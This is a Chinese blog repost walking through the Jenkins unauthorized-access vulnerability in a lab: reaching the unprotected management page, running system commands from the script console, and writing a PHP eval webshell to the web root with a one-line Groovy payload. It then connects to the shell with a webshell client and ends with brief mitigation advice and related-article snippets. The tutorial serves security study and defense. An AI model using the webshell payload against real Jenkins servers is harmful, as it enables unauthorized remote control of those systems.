jenkins未授权访问漏洞

最新推荐文章于 2024-01-26 11:08:05 发布
最新推荐文章于 2024-01-26 11:08:05 发布
阅读量1.2k 收藏 2
点赞数
文章标签: 运维 shell php
原文链接:http://www.cnblogs.com/yuzly/p/11255609.html
版权

jenkins未授权访问漏洞

一、漏洞描述

未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。

二、漏洞环境搭建

1、官方下载jenkins-1.620-1.1.noarch.rpm,下载地址:http://mirrors.jenkins.io

2、在redhat安装jenkins

rpm -ivh jenkins-1.620-1.1.noarch.rpm

  

3、开启jenkins服务

  

4、浏览器访问http://192.168.10.137:8080,如下图所示说明环境搭建成功

  

三、漏洞复现

1、浏览器访问http://192.168.10.137:8080/manage,可以看到没有做任何限制,可以直接访问

  

2、点击”脚本命令行”

  

3、执行系统命令,下图看到成功执行系统命令

  

4、利用”脚本命令行”上传webshell,内容如下:

new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

  

5、点击“运行”,没有报错,上传成功

6、菜刀连接

  

四、漏洞防御

1、对后台控制页面做登录验证限制

2、升级版本

转载于:https://www.cnblogs.com/yuzly/p/11255609.html

WY92139010
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
Jenkins授权访问漏洞复现与 getshell 利用方法汇总
W小哥
09-23 5525
一、Jenkins介绍 1.1 什么是JenkinsJenkins是一个开源的、提供友好操作界面的持续集成(CI)工具,起源于Hudson(Hudson是商用的),主要用于持续、自动的构建/测试软件项目、监控外部任务的运行。Jenkins用Java语言编,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。常用的版本控制工具有SVN、GIT,构建工具有Maven、Ant、Gradle。 1.2 Jenkins的功能 Jenkins是一个基于J
[高危] Jenkins CLI 任意文件读取漏洞导致远程代码执行风险
weixin_43564241的博客
01-26 905
Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,该库默认将参数中 @ 字符后的文件路径替换为文件内容,攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件),并结合 Resource Root URL、Remember me cookie、存储型 XSS 或 CSRF 等。Jenkins 2.442, LTS 2.426.3 版本通过禁用命令解析器读取 @ 字符后文件路径的特性修复此漏洞
利用jenkins授权漏洞获取主机权限
Bird&Bird
05-19 426
目录一、背景二、漏洞原因三、漏洞复现 一、背景 Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。 二、漏洞原因 jenkins 设置帐号密码,或者使用了弱帐号密码 三、漏洞复现 1、访问http://192.168.10.27:1234/script,发现不需要登录就可以访问。 2、输入命令执行,发现可以执行任意命令 print
Jenkins一些安全问题
可爱的我可爱的code
11-19 1214
欢迎大家到我的博客查看:http://www.xpshuai.cn 漏洞简介及危害 默认情况下 Jenkins面面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行行界面从而获取服务器权限。 环境搭建 # 下载地址: https://www.jenkins.io/download/ # 可以直接下载war包 java -jar jenkins.war # 运行 # wget http://mirrors.jenkins.
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4156
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
Jenkins授权访问
weixin_43622525的博客
03-04 2725
Jenkins Jenkins简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,它能把软件开发过程形成工作流。默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。 Jenkins授权访问 部署Jenkins 1.62版本,将全局授权策略打开,目前新版本的Jenkins已默认需要用户登录,但老版的中默认配置是“任意用...
漏洞分析|死磕Jenkins漏洞回显与利用效果
m0_46699477的博客
06-28 1193
本文以 Jenkins 反序列化漏洞作为优化案例,分享我们的解决漏洞问题的方式。
jenkins漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-13 1528
jenkins漏洞概述,Jenkins是一个开源软件项目,它是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 3月9日,启明星辰VSRC监测到Jenkins官方发布安全公告,修复了Jenkins Server和Update Center中发现的2个跨站脚本漏洞(CVE-2023-27898和CVE-2023-27905,统称为“CorePlague”)。经身份验证的威胁者可利用这些漏洞在受害者的 Jenkins Server上执
99-web漏洞挖掘之授权访问漏洞1
08-03
1、Redis授权访问 3、MongoDB授权访问 4、ZooKeeper 授权访问 5、Elasticsearch 授权访问 6、Memcache
jenkins集成OWSAP ZAP插件方法
01-26
jenkins集成安全漏洞扫描工具OWSAP ZAP
钉钉OA流程审批,Jenkins自动授权通知用户密码
11-24
为了简化jenkins版本发布流程,使开发人员能更灵活的控制版本的更新迭代,现准备将Jenkins的版本发布流程,从OA系统转到钉钉软件。在钉钉的OA工作台上提交版本发布流程,审批通过过,钉钉将自动发送Jenkins登陆帐号...
jenkins老版本资源
11-09
jenkins老版本资源
jenkins2.289.1版本远程命令执行漏洞
山兔的博客
11-13 2822
在网络安全行业中,有一种方法可以识别、定义和编目公开披露的漏洞。这种类型的标识称为CVE,代表常见漏洞和披露。分析后,为每个漏洞分配一个严重等级,称为 CVSS 分数,范围从 0 到 10,其中 0 表示信息,10 表示严重。这些分数取决于几个因素,其中一些是 CIA 的危害级别(机密性、完整性、可用性)、攻击复杂程度、攻击面的大小等。在计算机安全中,任意代码执行 (ACE) 是攻击者在目标计算机或目标进程中执行任意命令或代码的能力。[…]旨在利用此类漏洞的程序称为任意代码执行漏洞
Jenkins授权访问+命令执行
m0_49577923的博客
11-11 5713
前言 翻越高山需要迈出一个又一个简单的步伐 一、Jenkins简介 Jenkins是一个独立的、开放源码的自动化服务器,它可以用于自动化与构建、测试、交付或部署软件相关的各种任务。Jenkins是一个CI工具。它可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告 二、Jenkins授权访问 由于Jenkins默认安装的时候管理员安全意识不高,没有配置密码,所以可以导致任意用户授权访问到控制页面并且可以对里面的配置进行修改。 正常页面应该是需
Jenkins授权访问漏洞
qq_50854662的博客
07-08 1547
Jenkins授权访问漏洞
Jenkins跨站脚本漏洞
VoiceRoom的博客
03-09 754
CVE-2023-27898
Jenkins RCE 漏洞复现(CVE-2017-1000353、CVE-2018-1000861)
oiadkt的博客
09-21 1236
Jenkins 是软件测试过程中常用的一种持续构建的工具,Jenkins RCE 漏洞触发方式大致分为两种,一种使用 Jenkins CLI 触发,而另一种触发方式为 HTTP 请求触发。这里复现的 CVE-2017-1000353 与 CVE-2018-1000861 就是两种触发方式的代表。
Web漏洞-授权访问漏洞
Ays.Ie的博客
03-21 3171
该篇记录了web漏洞-授权访问漏洞的相关知识
jenkins 漏洞如何排查
最新发布
02-01
Jenkins是一个开源的持续集成和交付工具,它提供了丰富的功能和插件来帮助开发团队自动化构建、测试和部署软件项目。然而,由于Jenkins的广泛使用和开放的插件生态系统,可能存在一些安全漏洞。下面是一些排查Jenkins漏洞的常见方法: 1. 定期更新Jenkins和插件:及时更新Jenkins和其插件是防止漏洞利用的重要步骤。Jenkins官方会发布安全更新,你可以通过Jenkins的管理界面或者命令行工具进行更新。 2. 审查Jenkins日志:Jenkins会生成详细的日志记录,包括构建过程、插件使用等信息。通过审查日志,你可以发现异常行为或者异常请求,从而判断是否存在漏洞。 3. 使用安全扫描工具:可以使用一些专门的安全扫描工具来扫描Jenkins服务器,以发现潜在的漏洞。例如,可以使用OWASP ZAP、Nessus等工具进行漏洞扫描。 4. 配置访问控制:确保Jenkins访问权限设置正确,只有授权的用户可以访问和执行敏感操作。可以使用Jenkins提供的RBAC(Role-Based Access Control)插件来管理用户权限。 5. 审查插件的安全性:Jenkins的插件生态系统非常丰富,但并不是所有插件都是安全可靠的。在选择和使用插件时,要注意查看插件的评级、下载量、最近更新时间等信息,选择受信任的插件。 6. 监控系统行为:通过监控Jenkins服务器的系统行为,例如网络流量、CPU和内存使用情况等,可以及时发现异常活动或者资源消耗异常的情况。 7. 参考安全建议和最佳实践:Jenkins官方提供了一些安全建议和最佳实践,可以参考官方文档来加强Jenkins的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值